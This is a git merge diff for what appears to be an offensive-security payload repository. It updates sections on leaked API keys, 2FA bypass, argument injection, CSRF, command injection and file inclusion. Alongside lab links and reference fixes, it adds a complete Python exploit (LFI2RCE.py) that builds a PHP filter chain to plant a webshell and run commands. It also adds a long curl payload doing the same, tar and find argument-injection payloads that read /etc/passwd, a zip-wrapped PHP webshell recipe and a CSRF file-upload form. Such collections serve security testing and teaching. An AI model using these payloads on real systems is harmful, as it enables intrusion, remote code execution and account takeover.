Merge branch 'master' into patch-4
3
.gitignore
vendored
@ -1,4 +1,3 @@
|
||||
BuildPDF/
|
||||
.vscode
|
||||
.todo
|
||||
AWS Amazon Lambda/
|
||||
.todo
|
@ -24,15 +24,16 @@
|
||||
## Tools
|
||||
|
||||
- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
|
||||
- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
|
||||
- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
|
||||
- [KeyHacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
|
||||
- [TruffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
|
||||
```ps1
|
||||
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
|
||||
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
|
||||
trufflehog git https://github.com/trufflesecurity/trufflehog.git
|
||||
trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
|
||||
```
|
||||
|
||||
- [Trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets](https://github.com/aquasecurity/trivy)
|
||||
|
||||
## Exploit
|
||||
|
||||
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
|
||||
|
@ -159,10 +159,10 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
|
||||
## References
|
||||
|
||||
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
|
||||
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
|
||||
* [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
|
||||
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
|
||||
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
|
||||
* [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
|
||||
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
|
||||
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
|
||||
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
|
||||
|
@ -27,6 +27,7 @@
|
||||
* [Backup Code Abuse](#backup-code-abuse)
|
||||
* [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
|
||||
* [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
|
||||
* [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
|
||||
* [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
|
||||
* [Bypass 2FA with array](#bypass-2fa-with-array)
|
||||
* [References](#references)
|
||||
@ -228,6 +229,10 @@ Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
|
||||
|
||||
If the session is already hijacked and there is a session timeout vuln
|
||||
|
||||
### Bypass 2FA by Force Browsing
|
||||
|
||||
If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
|
||||
|
||||
### Bypass 2FA with null or 000000
|
||||
Enter the code **000000** or **null** to bypass 2FA protection.
|
||||
|
||||
@ -257,8 +262,9 @@ Enter the code **000000** or **null** to bypass 2FA protection.
|
||||
|
||||
## References
|
||||
|
||||
- [10 Password Reset Flaws - Anugrah SR](http://anugrahsr.me/posts/10-Password-reset-flaws/)
|
||||
- [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
|
||||
- [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be)
|
||||
- [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
|
||||
- [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
|
||||
- [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
||||
- [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)
|
||||
|
89
Argument Injection/README.md
Normal file
@ -0,0 +1,89 @@
|
||||
# Argument Injection
|
||||
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
|
||||
|
||||
It can happen in different situations, where you can only inject arguments to a command:
|
||||
|
||||
- Improper sanitization (regex)
|
||||
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
|
||||
- Bash expansion (ex: *)
|
||||
|
||||
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
|
||||
```py
|
||||
from shlex import quote,split
|
||||
import sys
|
||||
import subprocess
|
||||
|
||||
if __name__=="__main__":
|
||||
command = ['curl']
|
||||
command = command + split(sys.argv[1])
|
||||
print(command)
|
||||
r = subprocess.Popen(command)
|
||||
```
|
||||
It is possible for an attacker to pass several words to abuse options from ```curl``` command
|
||||
```ps1
|
||||
python python_rce.py "https://www.google.fr -o test.py"
|
||||
```
|
||||
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
|
||||
```ps1
|
||||
['curl', 'https://www.google.fr', '-o', 'test.py']
|
||||
```
|
||||
## Summary
|
||||
|
||||
* [List of exposed commands](#list-of-exposed-commands)
|
||||
* [TAR](#TAR)
|
||||
* [CURL](#CURL)
|
||||
* [WGET](#WGET)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## List of exposed commands
|
||||
|
||||
### CURL
|
||||
It is possible to abuse ```curl``` through the following options:
|
||||
|
||||
```ps1
|
||||
-o, --output <file> Write to file instead of stdout
|
||||
-O, --remote-name Write output to a file named as the remote file
|
||||
```
|
||||
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
|
||||
|
||||
### TAR
|
||||
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
|
||||
|
||||
Argument injection can happen into the '''extract''' command:
|
||||
```ps1
|
||||
--to-command <command>
|
||||
--checkpoint=1 --checkpoint-action=exec=<command>
|
||||
-T <file> or --files-from <file>
|
||||
```
|
||||
|
||||
Or in the '''create''' command:
|
||||
```ps1
|
||||
-I=<program> or -I <program>
|
||||
--use-compres-program=<program>
|
||||
```
|
||||
There are also short options to work without spaces:
|
||||
```ps1
|
||||
-T<file>
|
||||
-I"/path/to/exec"
|
||||
```
|
||||
|
||||
### FIND
|
||||
Find some_file inside /tmp directory.
|
||||
```php
|
||||
$file = "some_file";
|
||||
system("find /tmp -iname ".escapeshellcmd($file));
|
||||
```
|
||||
|
||||
Print /etc/passwd content.
|
||||
```php
|
||||
$file = "sth -or -exec cat /etc/passwd ; -quit";
|
||||
system("find /tmp -iname ".escapeshellcmd($file));
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
|
||||
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
|
||||
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
|
@ -244,6 +244,13 @@ function reqListener() {
|
||||
};
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
|
||||
* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
|
||||
* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
|
||||
* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
|
||||
|
||||
## Bug Bounty reports
|
||||
|
||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||
|
@ -103,6 +103,9 @@ Remainder:
|
||||
* %E5%98%BE = %3E = \u563e (>)
|
||||
* %E5%98%BC = %3C = \u563c (<)
|
||||
|
||||
## Labs
|
||||
|
||||
* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
|
||||
|
||||
## Exploitation Tricks
|
||||
* Try to search for parameters that lead to redirects and fuzz them
|
||||
|
@ -11,6 +11,7 @@
|
||||
* [HTML GET - No User Interaction)](#html-get---no-user-interaction)
|
||||
* [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
|
||||
* [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
|
||||
* [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
|
||||
* [JSON GET - Simple Request](#json-get---simple-request)
|
||||
* [JSON POST - Simple Request](#json-post---simple-request)
|
||||
* [JSON POST - Complex Request](#json-post---complex-request)
|
||||
@ -67,6 +68,27 @@ When you are logged in to a certain site, you typically have a session. The iden
|
||||
</script>
|
||||
```
|
||||
|
||||
### HTML POST - multipart/form-data with file upload - Requiring User Interaction
|
||||
|
||||
```html
|
||||
<script>
|
||||
function launch(){
|
||||
const dT = new DataTransfer();
|
||||
const file = new File( [ "CSRF-filecontent" ], "CSRF-filename" );
|
||||
dT.items.add( file );
|
||||
document.xss[0].files = dT.files;
|
||||
|
||||
document.xss.submit()
|
||||
}
|
||||
</script>
|
||||
|
||||
<form style="display: none" name="xss" method="post" action="<target>" enctype="multipart/form-data">
|
||||
<input id="file" type="file" name="file"/>
|
||||
<input type="submit" name="" value="" size="0" />
|
||||
</form>
|
||||
<button value="button" onclick="launch()">Submit Request</button>
|
||||
```
|
||||
|
||||
|
||||
### JSON GET - Simple Request
|
||||
|
||||
@ -138,6 +160,18 @@ Referer: https://attacker.com/csrf.html;trusted.domain.com
|
||||
Referer: https://trusted.domain.com.attacker.com/csrf.html
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses)
|
||||
* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method)
|
||||
* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present)
|
||||
* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session)
|
||||
* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie)
|
||||
* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)
|
||||
* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present)
|
||||
* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
|
||||
|
@ -53,11 +53,11 @@ Any formula can be started with
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
|
||||
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
|
||||
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
|
||||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection)
|
||||
* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection)
|
||||
* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
|
||||
* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
|
||||
* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
|
||||
* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
|
||||
* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
|
||||
* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
|
||||
|
||||
|
@ -1,5 +1,9 @@
|
||||
# Common Vulnerabilities and Exposures
|
||||
|
||||
## Tools
|
||||
|
||||
- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
|
||||
|
||||
## Big CVEs in the last 5 years.
|
||||
|
||||
### CVE-2017-0144 - EternalBlue
|
||||
|
@ -297,9 +297,18 @@ echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(
|
||||
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
|
||||
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
|
||||
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
|
||||
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
|
||||
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
|
||||
|
||||
## References
|
||||
|
||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
||||
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
|
||||
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
|
||||
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
|
||||
* [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)
|
||||
|
@ -194,6 +194,14 @@ The following log files are controllable and can be included with an evil payloa
|
||||
/var/log/sshd.log
|
||||
/var/log/mail
|
||||
```
|
||||
## Labs
|
||||
|
||||
* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
|
||||
* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
|
||||
* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
|
||||
* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
|
||||
* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
|
||||
* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
|
||||
|
||||
## References
|
||||
|
||||
|
60
File Inclusion/LFI2RCE.py
Normal file
@ -0,0 +1,60 @@
|
||||
import requests
|
||||
|
||||
url = "http://localhost:8000/chall.php"
|
||||
file_to_use = "/etc/passwd"
|
||||
command = "id"
|
||||
|
||||
#<?=`$_GET[0]`;;?>
|
||||
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
|
||||
|
||||
conversions = {
|
||||
'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
|
||||
'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
|
||||
'C': 'convert.iconv.UTF8.CSISO2022KR',
|
||||
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
|
||||
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
|
||||
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
|
||||
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
|
||||
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
|
||||
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
|
||||
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
|
||||
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
|
||||
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
|
||||
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
|
||||
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
|
||||
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
|
||||
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
|
||||
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
|
||||
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
|
||||
}
|
||||
|
||||
|
||||
# generate some garbage base64
|
||||
filters = "convert.iconv.UTF8.CSISO2022KR|"
|
||||
filters += "convert.base64-encode|"
|
||||
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
|
||||
for c in base64_payload[::-1]:
|
||||
filters += conversions[c] + "|"
|
||||
# decode and reencode to get rid of everything that isn't valid base64
|
||||
filters += "convert.base64-decode|"
|
||||
filters += "convert.base64-encode|"
|
||||
# get rid of equal signs
|
||||
filters += "convert.iconv.UTF8.UTF7|"
|
||||
|
||||
filters += "convert.base64-decode"
|
||||
|
||||
final_payload = f"php://filter/{filters}/resource={file_to_use}"
|
||||
|
||||
with open('payload', 'w') as f:
|
||||
f.write(final_payload)
|
||||
|
||||
r = requests.get(url, params={
|
||||
"0": command,
|
||||
"action": "include",
|
||||
"file": final_payload
|
||||
})
|
||||
|
||||
print(r.text)
|
@ -140,7 +140,7 @@ http://example.com/index.php?page=php://filter/convert.base64-encode/resource=in
|
||||
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
|
||||
```
|
||||
|
||||
can be chained with a compression wrapper for large files.
|
||||
Wrappers can be chained with a compression wrapper for large files.
|
||||
|
||||
```powershell
|
||||
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
|
||||
@ -155,16 +155,28 @@ NOTE: Wrappers can be chained multiple times using `|` or `/`:
|
||||
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php
|
||||
```
|
||||
|
||||
Also there is a way to turn the `php://filter` into a full RCE. Use [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload.
|
||||
|
||||
```powershell
|
||||
# vulnerable file: index.php
|
||||
# vulnerable parameter: file
|
||||
# executed command: id
|
||||
# executed PHP code: <?=`$_GET[0]`;;?>
|
||||
curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
|
||||
```
|
||||
|
||||
|
||||
### Wrapper zip://
|
||||
|
||||
```python
|
||||
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
||||
zip payload.zip payload.php;
|
||||
mv payload.zip shell.jpg;
|
||||
rm payload.php
|
||||
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
|
||||
2. Zip the file
|
||||
```python
|
||||
zip payload.zip payload.php;
|
||||
mv payload.zip shell.jpg;
|
||||
rm payload.php
|
||||
```
|
||||
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
||||
|
||||
http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
||||
```
|
||||
|
||||
### Wrapper data://
|
||||
|
||||
@ -175,6 +187,7 @@ NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
|
||||
|
||||
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
|
||||
|
||||
|
||||
### Wrapper expect://
|
||||
|
||||
```powershell
|
||||
@ -182,6 +195,7 @@ http://example.com/index.php?page=expect://id
|
||||
http://example.com/index.php?page=expect://ls
|
||||
```
|
||||
|
||||
|
||||
### Wrapper input://
|
||||
|
||||
Specify your payload in the POST parameters, this can be done with a simple `curl` command.
|
||||
@ -196,6 +210,7 @@ Alternatively, Kadimus has a module to automate this attack.
|
||||
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
|
||||
```
|
||||
|
||||
|
||||
### Wrapper phar://
|
||||
|
||||
Create a phar file with a serialized object in its meta-data.
|
||||
@ -229,6 +244,7 @@ include('phar://test.phar');
|
||||
|
||||
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
|
||||
|
||||
|
||||
## LFI to RCE via /proc/*/fd
|
||||
|
||||
1. Upload a lot of shells (for example : 100)
|
||||
@ -243,6 +259,7 @@ GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
|
||||
